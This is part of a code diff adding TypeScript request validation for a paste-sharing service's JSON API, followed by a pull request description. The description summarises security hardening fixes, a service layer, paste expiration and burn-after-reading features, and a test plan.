+  isOneTime?: boolean;
+  isEncrypted?: boolean;
+  expireDuration?: string;
+  burnAfterReads?: number;
+}
+
+/**
+ * Validate an API v1 paste creation request.
+ */
+export function validateApiV1CreatePaste(
+  body: unknown,
+): ValidationResult<ApiV1CreatePasteInput> {
+  const errors: ValidationErrorDetail[] = [];
+
+  if (typeof body !== "object" || body === null) {
+    return failure([
+      {
+        field: "body",
+        message: "Request body must be a JSON object",
+        code: "invalid_type",
+      },
+    ]);
+  }
+
+  const obj = body as Record<string, unknown>;
+
+  // content: required string, non-empty
+  if (typeof obj.content !== "string") {
+    errors.push({
+      field: "content",
+      message: "content is required and must be a string",
+      code: "required",
+    });
+  } else if (obj.content.length === 0) {
+    errors.push({
+      field: "content",
+      message: "content cannot be empty",
+      code: "too_small",
+    });
+  } else if (new TextEncoder().encode(obj.content).length > MAX_PASTE_SIZE) {
+    errors.push({
+      field: "content",
+      message: `content exceeds maximum size of ${MAX_PASTE_SIZE} bytes`,
+      code: "too_big",
+    });
+  }
+
+  // contentType: optional string
+  if (obj.contentType !== undefined && typeof obj.contentType !== "string") {
+    errors.push({
+      field: "contentType",
+      message: "contentType must be a string",
+      code: "invalid_type",
+    });
+  }
+
+  // filename: optional string
+  if (obj.filename !== undefined && typeof obj.filename !== "string") {
+    errors.push({
+      field: "filename",
+      message: "filename must be a string",
+      code: "invalid_type",
+    });
+  }
+
+  // isOneTime: optional boolean
+  if (obj.isOneTime !== undefined && typeof obj.isOneTime !== "boolean") {
+    errors.push({
+      field: "isOneTime",
+      message: "isOneTime must be a boolean",
+      code: "invalid_type",
+    });
+  }
+
+  // isEncrypted: optional boolean
+  if (obj.isEncrypted !== undefined && typeof obj.isEncrypted !== "boolean") {
+    errors.push({
+      field: "isEncrypted",
+      message: "isEncrypted must be a boolean",
+      code: "invalid_type",
+    });
+  }
+
+  // expireDuration: optional valid duration
+  if (obj.expireDuration !== undefined) {
+    if (typeof obj.expireDuration !== "string") {
+      errors.push({
+        field: "expireDuration",
+        message: "expireDuration must be a string",
+        code: "invalid_type",
+      });
+    } else if (!isValidDuration(obj.expireDuration)) {
+      errors.push({
+        field: "expireDuration",
+        message: `Invalid duration format. Use format like "1h", "24h", "7d". Valid presets: ${VALID_EXPIRE_DURATIONS.join(", ")}`,
+        code: "invalid_enum_value",
+      });
+    }
+  }
+
+  // burnAfterReads: optional positive integer
+  if (obj.burnAfterReads !== undefined) {
+    if (typeof obj.burnAfterReads !== "number") {
+      errors.push({
+        field: "burnAfterReads",
+        message: "burnAfterReads must be a number",
+        code: "invalid_type",
+      });
+    } else if (
+      !Number.isInteger(obj.burnAfterReads) ||
+      obj.burnAfterReads < 1
+    ) {
+      errors.push({
+        field: "burnAfterReads",
+        message: "burnAfterReads must be a positive integer (1 or more)",
+        code: "too_small",
+      });
+    } else if (obj.burnAfterReads > MAX_BURN_READS) {
+      errors.push({
+        field: "burnAfterReads",
+        message: `burnAfterReads cannot exceed ${MAX_BURN_READS}`,
+        code: "too_big",
+      });
+    }
+  }
+
+  if (errors.length > 0) {
+    return failure(errors);
+  }
+
+  return success({
+    content: obj.content as string,
+    contentType: (obj.contentType as string) || "text/plain",
+    filename: obj.filename as string | undefined,
+    isOneTime: (obj.isOneTime as boolean) || false,
+    isEncrypted: (obj.isEncrypted as boolean) || false,
+    expireDuration: obj.expireDuration as string | undefined,
+    burnAfterReads: obj.burnAfterReads as number | undefined,
+  });
+}
+
+// ============================================
+// Helpers
+// ============================================
+
+/**
+ * Check if a duration string is valid.
+ * Accepts preset values or custom format like "2h", "3d", "15m".
+ */
+function isValidDuration(duration: string): boolean {
+  // Accept preset values
+  if (VALID_EXPIRE_DURATIONS.includes(duration)) {
+    return true;
+  }
+  // Accept custom format: positive integer followed by m, h, d, or w
+  const match = duration.match(/^(\d+)([mhdw])$/);
+  if (!match) {
+    return false;
+  }
+  const value = parseInt(match[1], 10);
+  return value > 0 && value <= 365; // Cap at 365 days for "d" unit
+}
+
+/**
+ * Format validation errors into a human-readable error response.
+ */
+export function formatValidationErrors(
+  errors: ValidationErrorDetail[],
+): string {
+  return errors.map((e) => `${e.field}: ${e.message}`).join("; ");
+}

--- a/wrangler.toml
+++ b/wrangler.toml
@@ -1,6 +1,6 @@
 name = "dedpaste"
 main = "dist/index.js"
-compatibility_date = "2023-10-02"
+compatibility_date = "2025-01-01"
 
 # Build configuration
 [build]


### PR DESCRIPTION
## Summary

- **14 security findings remediated** from a comprehensive codebase audit (4 Critical, 6 High, 2 Medium, 2 Low)
- **Service layer architecture** with dependency-injected storage, paste, and encryption services
- **API v1** with structured JSON responses (`/api/v1/health`, `/api/v1/paste` CRUD)
- **Paste lifecycle management**: configurable expiration (`X-Expire`) and burn-after-reading with read counts (`X-Burn-Reads`)
- **Request validation** with typed schemas for all upload endpoints
- **Agent team definitions** (`.agents/`) for coordinated development workflows

## Security Fixes

| Severity | ID | Fix |
|----------|-----|-----|
| Critical | C1 | `crypto.getRandomValues()` replaces `Math.random()` for paste IDs; default length 8→16 |
| Critical | C2 | HTML sanitizer strips `<script>`, `<iframe>`, event handlers from markdown output |
| High | H1 | CSP, HSTS, X-Frame-Options, X-Content-Type-Options, Referrer-Policy on all responses |
| High | H2 | CORS restricted from `*` to `paste.d3d.dev` + localhost |
| High | H3 | `sanitizeFilename()` prevents Content-Disposition header injection |
| High | H4 | `sanitizeKeyName()` + `validatePathWithinDir()` on all key storage functions |
| High | H5 | 25MB upload size limit on standard uploads (413 response) |
| High | H6 | RSA key generation upgraded from 2048 to 4096 bits |
| Medium | M5 | `crypto.randomBytes()` replaces `Math.random()` for fallback PGP key IDs |
| Medium | M7 | `TEST_MODE` passphrase bypass removed from production code |
| Low | L2 | `rel="noopener noreferrer"` on all `target="_blank"` links |
| Low | L4 | Node.js engine requirement updated to `>=18` |
| Low | L6 | Wrangler compatibility date updated to `2025-01-01` |
| Bonus | -- | Stale footer version fixed (1.13.2→1.23.2), keyboard focus indicators restored |

## New Features

### Service Layer (`src/services/`)
- `StorageService` — R2/KV abstraction with paste lifecycle management
- `PasteService` — CRUD business logic with duration parsing and URL building
- `EncryptionService` — Server-side encryption utilities with Web Crypto API
- Factory pattern via `createServices()` with dependency injection

### API v1 (`src/api/v1/`)
- `GET /api/v1/health` — Health check with service status
- `POST /api/v1/paste` — Create paste with validation
- `GET /api/v1/paste/:id` — Retrieve paste as structured JSON
- `DELETE /api/v1/paste/:id` — Delete paste
- Consistent `{ success, data, error }` response format

### Paste Lifecycle
- `X-Expire: 1h|24h|7d|30d` header sets auto-expiration
- `X-Burn-Reads: N` header sets read-count-based deletion
- Expired pastes auto-deleted on retrieval with `X-Expired: true` header
- Response headers include `X-Expires-At` and `X-Remaining-Reads`

### Request Validation (`src/validation/`)
- Pure TypeScript schemas (no runtime deps) for Cloudflare Workers compatibility
- `validateTextUpload`, `validateWebUpload` with field-level error details
- `parseJsonBody`, `checkValidation` middleware helpers

## Files Changed
- **26 files** changed: 5,774 insertions, 897 deletions
- **9 new modules** across `src/services/`, `src/validation/`, `src/api/v1/`
- **8 agent definitions** in `.agents/` with audit reports and sprint plan

## Test plan
- [ ] Verify `npm run build` compiles cleanly
- [ ] Verify existing paste creation/retrieval still works
- [ ] Test `X-Expire: 1h` header creates expiring paste
- [ ] Test `X-Burn-Reads: 3` header limits read count
- [ ] Test `GET /api/v1/health` returns structured JSON
- [ ] Test `POST /api/v1/paste` creates paste via JSON API
- [ ] Verify security headers present on all responses (CSP, HSTS, X-Frame-Options)
- [ ] Verify CORS rejects requests from unauthorized origins
- [ ] Verify uploads > 25MB are rejected with 413
- [ ] Verify markdown pastes with `<script>` tags are sanitized

🤖 Generated with [Claude Code](https://claude.com/claude-code)